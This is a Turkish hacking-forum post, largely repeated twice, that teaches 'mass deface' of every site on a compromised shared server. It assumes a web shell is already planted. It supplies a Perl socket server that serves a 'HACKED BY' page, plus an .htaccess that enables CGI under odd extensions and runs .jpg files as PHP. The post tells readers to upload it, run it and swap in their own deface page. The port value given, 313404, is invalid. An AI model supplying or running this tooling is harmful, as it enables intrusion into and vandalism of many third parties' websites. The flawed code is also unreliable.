Onaylı Üye
Merhaba değerli memoryhackers üyeleri, bugün sizlerle ilk konumu paylaşmak istiyorum port hacking..
Nedir bu port ?
Port, bir bilgisayarla dış aygıtlar arasındaki kablolu veya kablosuz iletişimi sağlayan veri kanalı. Portlar, seri ve paralel olmak üzere iki temel kısımda incelenir. SCSI, USB, PCMCIA gibi aynı anda birden fazla dış aygıtın bilgisayara bağlanabilmesine olanak tanıyan portlar da bulunmaktadır.
Mass Deface nedir?
Mass Deface diye adlandırılan bu işlem sunucuda,hosting de barınan birden fazla siteye index atmaya denir, bunu çeşitli yolları vardır bugün port ile mass deface yapacağız hemen başlayalım..
Şimdi, hedef sitemize shell attığımızı var sayıyorum artık sunucuda site sahibi kadar belki daha fazla yetkimiz var, öncelikle perl dili ile yazılmış olan benim geliştirmesini yaptığım bir tool'u sizlere tanıtmak istiyorum peki bu tool ne işe yaracak.
Şimdi arkadaşlar, aşşağıda vereceğim kodları bir metin belgesine atıp perl (.pl) olarak kayıt edip sunucuya yüklüyoruz.
/home/kullanıcı/public_html/upload/mh.pl dizinine upload ettiğimizi var sayalım, ve tabiki upload ettiğimiz klasöre .htacces dosyasınıda atmayı unutmuyoruz. şimdi execute yani komut çalıştır kısmından, perl dosyamızı çalıştıralım nasıl mı ?
perl mh.pl Diyerek dosyamızı çalıştırdı şimdi yapacağı işlem sunucudaki bütün sitelere, bakın sitedeki demiyorum sunucudaki bütün sitelere güvenli gibi görünün aslında indeximizi yansıtacak bir port acacak artık şansınıza, sunucuda kaç site varsa okadar zone sizindir.
Perl Dosyası
.HTACCES DOSYASI
Şimdi perl dosyasını kendinize göre editlemeye geçelim dostlar, " print $client 'HACKED BY Zer0day - MemoryHackers.org '; " Kısmına kendi index kodlarınızı yapıştırın.
my $server = IO::Socket::INET->new(
LocalPort => 313404, Kısmında ise, "313404" Yani sunucuda açılcak port adresini belirliyorsunuz.
Teşekkür ederim kesinlikle alıntı değildir konuyu baştan aşşağı kendim yazdım, kodlardaki bozuk yerleri kendim düzenledim kodları kendim YAZMADIM
Nedir bu port ?
Port, bir bilgisayarla dış aygıtlar arasındaki kablolu veya kablosuz iletişimi sağlayan veri kanalı. Portlar, seri ve paralel olmak üzere iki temel kısımda incelenir. SCSI, USB, PCMCIA gibi aynı anda birden fazla dış aygıtın bilgisayara bağlanabilmesine olanak tanıyan portlar da bulunmaktadır.
Mass Deface nedir?
Mass Deface diye adlandırılan bu işlem sunucuda,hosting de barınan birden fazla siteye index atmaya denir, bunu çeşitli yolları vardır bugün port ile mass deface yapacağız hemen başlayalım..
Şimdi, hedef sitemize shell attığımızı var sayıyorum artık sunucuda site sahibi kadar belki daha fazla yetkimiz var, öncelikle perl dili ile yazılmış olan benim geliştirmesini yaptığım bir tool'u sizlere tanıtmak istiyorum peki bu tool ne işe yaracak.
Şimdi arkadaşlar, aşşağıda vereceğim kodları bir metin belgesine atıp perl (.pl) olarak kayıt edip sunucuya yüklüyoruz.
/home/kullanıcı/public_html/upload/mh.pl dizinine upload ettiğimizi var sayalım, ve tabiki upload ettiğimiz klasöre .htacces dosyasınıda atmayı unutmuyoruz. şimdi execute yani komut çalıştır kısmından, perl dosyamızı çalıştıralım nasıl mı ?
perl mh.pl Diyerek dosyamızı çalıştırdı şimdi yapacağı işlem sunucudaki bütün sitelere, bakın sitedeki demiyorum sunucudaki bütün sitelere güvenli gibi görünün aslında indeximizi yansıtacak bir port acacak artık şansınıza, sunucuda kaç site varsa okadar zone sizindir.
Perl Dosyası
Kod:
#!/usr/bin/perl -w
use strict;
use IO::Socket;
sub Wait {
wait; # wait needed to keep <defunct> pids from building up
}
$SIG{CHLD} = \&Wait;
my $server = IO::Socket::INET->new(
LocalPort => 313404,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10) or die "$@\n";
my $client ;
while($client = $server->accept()) {
select $client;
print $client "HTTP/1.0 200 OK\r\n";
print $client "Content-type: text/html\r\n\r\n";
print $client 'HACKED BY Zer0day - MemoryHackers.org ';
}
continue {
close($client); #kills hangs
kill CHLD => -$$;
}.HTACCES DOSYASI
Kod:
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script d4bos cgi pl tg love h4 tgb x-zone
AddType application/x-httpd-php .jpg
RewriteEngine on
RewriteRule (.*)\war$ .d4bos
## END ##Şimdi perl dosyasını kendinize göre editlemeye geçelim dostlar, " print $client 'HACKED BY Zer0day - MemoryHackers.org '; " Kısmına kendi index kodlarınızı yapıştırın.
my $server = IO::Socket::INET->new(
LocalPort => 313404, Kısmında ise, "313404" Yani sunucuda açılcak port adresini belirliyorsunuz.
Teşekkür ederim kesinlikle alıntı değildir konuyu baştan aşşağı kendim yazdım, kodlardaki bozuk yerleri kendim düzenledim kodları kendim YAZMADIM
Moderatörün son düzenlenenleri:
